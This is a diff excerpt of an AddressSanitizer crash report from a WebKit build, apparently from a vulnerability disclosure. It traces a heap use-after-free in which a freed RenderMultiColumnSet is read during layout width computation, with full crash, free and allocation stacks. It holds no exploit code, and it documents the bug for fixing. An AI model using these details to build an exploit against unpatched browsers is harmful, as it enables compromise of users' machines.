+    #22 0x57b667687 in WebCore::RenderBox::minPreferredLogicalWidth() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3667687)
+    #23 0x57b5dfab8 in WebCore::RenderBlock::computeChildPreferredLogicalWidths(WebCore::RenderObject&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35dfab8)
+    #24 0x57b5ddf5a in WebCore::RenderBlock::computeBlockPreferredLogicalWidths(WebCore::LayoutUnit&, WebCore::LayoutUnit&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35ddf5a)
+    #25 0x57b5f2050 in WebCore::RenderBlockFlow::computeIntrinsicLogicalWidths(WebCore::LayoutUnit&, WebCore::LayoutUnit&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35f2050)
+    #26 0x57b5def8e in WebCore::RenderBlock::computePreferredLogicalWidths() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35def8e)
+    #27 0x57b667687 in WebCore::RenderBox::minPreferredLogicalWidth() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3667687)
+    #28 0x57b5dfab8 in WebCore::RenderBlock::computeChildPreferredLogicalWidths(WebCore::RenderObject&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35dfab8)
+    #29 0x57b5ddf5a in WebCore::RenderBlock::computeBlockPreferredLogicalWidths(WebCore::LayoutUnit&, WebCore::LayoutUnit&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35ddf5a)
+    #30 0x57b5f2050 in WebCore::RenderBlockFlow::computeIntrinsicLogicalWidths(WebCore::LayoutUnit&, WebCore::LayoutUnit&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35f2050)
+    #31 0x57b5def8e in WebCore::RenderBlock::computePreferredLogicalWidths() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35def8e)
+    #32 0x57b667687 in WebCore::RenderBox::minPreferredLogicalWidth() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3667687)
+    #33 0x57b5dfab8 in WebCore::RenderBlock::computeChildPreferredLogicalWidths(WebCore::RenderObject&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35dfab8)
+    #34 0x57b5ddf5a in WebCore::RenderBlock::computeBlockPreferredLogicalWidths(WebCore::LayoutUnit&, WebCore::LayoutUnit&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35ddf5a)
+    #35 0x57b5f2050 in WebCore::RenderBlockFlow::computeIntrinsicLogicalWidths(WebCore::LayoutUnit&, WebCore::LayoutUnit&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35f2050)
+    #36 0x57b5def8e in WebCore::RenderBlock::computePreferredLogicalWidths() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35def8e)
+    #37 0x57b667717 in WebCore::RenderBox::maxPreferredLogicalWidth() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3667717)
+    #38 0x57b691a26 in WebCore::RenderBox::computePositionedLogicalWidthUsing(WebCore::SizeType, WebCore::Length, WebCore::RenderBoxModelObject const&, WebCore::TextDirection, WebCore::LayoutUnit, WebCore::LayoutUnit, WebCore::Length, WebCore::Length, WebCore::Length, WebCore::Length, WebCore::RenderBox::LogicalExtentComputedValues&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3691a26)
+    #39 0x57b682cdf in WebCore::RenderBox::computePositionedLogicalWidth(WebCore::RenderBox::LogicalExtentComputedValues&, WebCore::RenderFragmentContainer*) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3682cdf)
+    #40 0x57b6815a3 in WebCore::RenderBox::computeLogicalWidthInFragment(WebCore::RenderBox::LogicalExtentComputedValues&, WebCore::RenderFragmentContainer*) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36815a3)
+    #41 0x57b681259 in WebCore::RenderBox::updateLogicalWidth() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3681259)
+    #42 0x57b5c7a7f in WebCore::RenderBlock::recomputeLogicalWidth() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35c7a7f)
+    #43 0x57b5f554b in WebCore::RenderBlockFlow::recomputeLogicalWidthAndColumnWidth() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35f554b)
+    #44 0x57b5f6636 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35f6636)
+    #45 0x57b5c7772 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35c7772)
+    #46 0x57b5cc8e9 in WebCore::RenderBlock::layoutPositionedObject(WebCore::RenderBox&, bool, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cc8e9)
+    #47 0x57b5cbd99 in WebCore::RenderBlock::layoutPositionedObjects(bool, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cbd99)
+    #48 0x57b5cb4d9 in WebCore::RenderBlock::simplifiedLayout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cb4d9)
+    #49 0x57b5f65ea in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35f65ea)
+    #50 0x57b5c7772 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35c7772)
+    #51 0x57b963a33 in WebCore::RenderView::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3963a33)
+    #52 0x57af0ca12 in WebCore::FrameViewLayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f0ca12)
+    #53 0x57a4326c9 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24326c9)
+    #54 0x57ad1ff37 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d1ff37)
+    #55 0x57ae1dded in WebCore::CachedResourceLoader::loadDone(WebCore::LoadCompletionType, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e1dded)
+    #56 0x57ada6b91 in WebCore::SubresourceLoader::notifyDone(WebCore::LoadCompletionType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6b91)
+    #57 0x57ada39f8 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da39f8)
+    #58 0x102386f2b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe2bf2b)
+    #59 0x10238b4b6 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe304b6)
+    #60 0x10238a7ae in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe2f7ae)
+    #61 0x10193d478 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3e2478)
+    #62 0x1016adcfe in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x152cfe)
+    #63 0x1016b90d6 in IPC::Connection::dispatchOneIncomingMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15e0d6)
+    #64 0x5879ca71c in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9071c)
+    #65 0x5879cb0d6 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x910d6)
+    #66 0x7fff2e899a60 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3a60)
+    #67 0x7fff2e95347b in __CFRunLoopDoSource0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x15d47b)
+    #68 0x7fff2e87c4bf in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x864bf)
+    #69 0x7fff2e87b93c in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8593c)
+    #70 0x7fff2e87b1a2 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x851a2)
+    #71 0x7fff2db61d95 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fd95)
+    #72 0x7fff2db61b05 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb05)
+    #73 0x7fff2db61883 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f883)
+    #74 0x7fff2be13a72 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a72)
+    #75 0x7fff2c5a9e33 in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7e33)
+    #76 0x7fff2be08884 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36884)
+    #77 0x7fff2bdd7a71 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5a71)
+    #78 0x7fff569e3dc6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x10dc6)
+    #79 0x7fff569e2a19 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xfa19)
+    #80 0x1015514c6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014c6)
+    #81 0x7fff56689014 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1014)
+
+0x6130001038a0 is located 352 bytes inside of 384-byte region [0x613000103740,0x6130001038c0)
+freed by thread T0 here:
+    #0 0x10579cfa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
+    #1 0x587a3d591 in bmalloc::IsoTLS::debugFree(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x103591)
+    #2 0x57b89bcbb in void bmalloc::IsoTLS::deallocateSlow<bmalloc::IsoConfig<384u>, WebCore::RenderMultiColumnSet>(bmalloc::api::IsoHeap<WebCore::RenderMultiColumnSet>&, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x389bcbb)
+    #3 0x57bb4bd90 in WebCore::RenderTreeBuilder::destroy(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b4bd90)
+    #4 0x57bb5f97f in WebCore::RenderTreeBuilder::MultiColumn::handleSpannerRemoval(WebCore::RenderMultiColumnFlow&, WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b5f97f)
+    #5 0x57bb5fe32 in WebCore::RenderTreeBuilder::MultiColumn::multiColumnRelativeWillBeRemoved(WebCore::RenderMultiColumnFlow&, WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b5fe32)
+    #6 0x57bb50659 in WebCore::RenderTreeBuilder::Block::detach(WebCore::RenderBlockFlow&, WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b50659)
+    #7 0x57bb4c05d in WebCore::RenderTreeBuilder::detach(WebCore::RenderElement&, WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b4c05d)
+    #8 0x57bb4bc63 in WebCore::RenderTreeBuilder::destroy(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b4bc63)
+    #9 0x57bb5406c in WebCore::RenderTreeBuilder::destroyAndCleanUpAnonymousWrappers(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b5406c)
+    #10 0x57bb6b6a4 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType, WebCore::RenderTreeBuilder&)::$_5::operator()(unsigned int) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b6b6a4)
+    #11 0x57bb695f0 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType, WebCore::RenderTreeBuilder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b695f0)
+    #12 0x57bb684ac in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b684ac)
+    #13 0x57bb67cf9 in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b67cf9)
+    #14 0x57bb6737a in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b6737a)
+    #15 0x57a431a1f in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2431a1f)
+    #16 0x57a433091 in WebCore::Document::updateStyleIfNeeded() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2433091)
+    #17 0x57a43266e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x243266e)
+    #18 0x57ad1ff37 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d1ff37)
+    #19 0x57ae1dded in WebCore::CachedResourceLoader::loadDone(WebCore::LoadCompletionType, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e1dded)
+    #20 0x57ada6b91 in WebCore::SubresourceLoader::notifyDone(WebCore::LoadCompletionType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6b91)
+    #21 0x57ada39f8 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da39f8)
+    #22 0x102386f2b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe2bf2b)
+    #23 0x10238b4b6 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe304b6)
+    #24 0x10238a7ae in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe2f7ae)
+    #25 0x10193d478 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3e2478)
+    #26 0x1016adcfe in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x152cfe)
+    #27 0x1016b90d6 in IPC::Connection::dispatchOneIncomingMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15e0d6)
+    #28 0x5879ca71c in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9071c)
+    #29 0x5879cb0d6 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x910d6)
+
+previously allocated by thread T0 here:
+    #0 0x10579ca3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
+    #1 0x7fff568321bc in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x21bc)
+    #2 0x587a29734 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xef734)
+    #3 0x587a3d48c in bmalloc::IsoTLS::debugMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10348c)
+    #4 0x57b89b8b9 in void* bmalloc::IsoTLS::allocateSlow<bmalloc::IsoConfig<384u>, WebCore::RenderMultiColumnSet>(bmalloc::api::IsoHeap<WebCore::RenderMultiColumnSet>&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x389b8b9)
+    #5 0x57b88921d in std::__1::unique_ptr<WebCore::RenderMultiColumnSet, WebCore::RenderObjectDeleter> WebCore::createRenderer<WebCore::RenderMultiColumnSet, WebCore::RenderMultiColumnFlow&, WebCore::RenderStyle>(WebCore::RenderMultiColumnFlow&&&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x388921d)
+    #6 0x57b8891ed in WebCore::RenderMultiColumnFlow::createMultiColumnSet(WebCore::RenderStyle&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38891ed)
+    #7 0x57bb5f187 in WebCore::RenderTreeBuilder::MultiColumn::processPossibleSpannerDescendant(WebCore::RenderMultiColumnFlow&, WebCore::RenderObject*&, WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b5f187)
+    #8 0x57bb5e8a2 in WebCore::RenderTreeBuilder::MultiColumn::multiColumnDescendantInserted(WebCore::RenderMultiColumnFlow&, WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b5e8a2)
+    #9 0x57bb51d69 in WebCore::RenderTreeBuilder::attachToRenderElementInternal(WebCore::RenderElement&, std::__1::unique_ptr<WebCore::RenderObject, WebCore::RenderObjectDeleter>, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b51d69)
+    #10 0x57bb4ebdb in WebCore::RenderTreeBuilder::attachToRenderElement(WebCore::RenderElement&, std::__1::unique_ptr<WebCore::RenderObject, WebCore::RenderObjectDeleter>, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b4ebdb)
+    #11 0x57bb4fff8 in WebCore::RenderTreeBuilder::Block::attachIgnoringContinuation(WebCore::RenderBlock&, std::__1::unique_ptr<WebCore::RenderObject, WebCore::RenderObjectDeleter>, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b4fff8)
+    #12 0x57bb4e653 in WebCore::RenderTreeBuilder::Block::attach(WebCore::RenderBlock&, std::__1::unique_ptr<WebCore::RenderObject, WebCore::RenderObjectDeleter>, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b4e653)
+    #13 0x57bb4e3f9 in WebCore::RenderTreeBuilder::BlockFlow::attach(WebCore::RenderBlockFlow&, std::__1::unique_ptr<WebCore::RenderObject, WebCore::RenderObjectDeleter>, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b4e3f9)
+    #14 0x57bb4d109 in WebCore::RenderTreeBuilder::attach(WebCore::RenderElement&, std::__1::unique_ptr<WebCore::RenderObject, WebCore::RenderObjectDeleter>, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b4d109)
+    #15 0x57bb520af in WebCore::RenderTreeBuilder::move(WebCore::RenderBoxModelObject&, WebCore::RenderBoxModelObject&, WebCore::RenderObject&, WebCore::RenderObject*, WebCore::RenderTreeBuilder::NormalizeAfterInsertion) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b520af)
+    #16 0x57bb52586 in WebCore::RenderTreeBuilder::moveChildren(WebCore::RenderBoxModelObject&, WebCore::RenderBoxModelObject&, WebCore::RenderObject*, WebCore::RenderObject*, WebCore::RenderObject*, WebCore::RenderTreeBuilder::NormalizeAfterInsertion) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b52586)
+    #17 0x57bb52633 in WebCore::RenderTreeBuilder::moveChildren(WebCore::RenderBoxModelObject&, WebCore::RenderBoxModelObject&, WebCore::RenderObject*, WebCore::RenderObject*, WebCore::RenderTreeBuilder::NormalizeAfterInsertion) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b52633)
+    #18 0x57bb5d29b in WebCore::RenderTreeBuilder::MultiColumn::createFragmentedFlow(WebCore::RenderBlockFlow&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b5d29b)
+    #19 0x57bb68e9f in WebCore::RenderTreeUpdater::updateAfterDescendants(WebCore::Element&, WebCore::Style::ElementUpdates const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b68e9f)
+    #20 0x57bb68e27 in WebCore::RenderTreeUpdater::popParent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b68e27)
+    #21 0x57bb67fc7 in WebCore::RenderTreeUpdater::popParentsToDepth(unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b67fc7)
+    #22 0x57bb67e3b in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b67e3b)
+    #23 0x57bb6737a in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b6737a)
+    #24 0x57a431a1f in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2431a1f)
+    #25 0x57a433091 in WebCore::Document::updateStyleIfNeeded() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2433091)
+    #26 0x57a4558a6 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24558a6)
+    #27 0x57aa7dcf4 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a7dcf4)
+    #28 0x57ad048ab in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d048ab)
+    #29 0x57accdf79 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ccdf79)
+
+SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1a70e2) in WebCore::LayoutUnit::rawValue() const
+Shadow bytes around the buggy address:
+  0x1c26000206c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1c26000206d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc
+  0x1c26000206e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+  0x1c26000206f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2600020700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
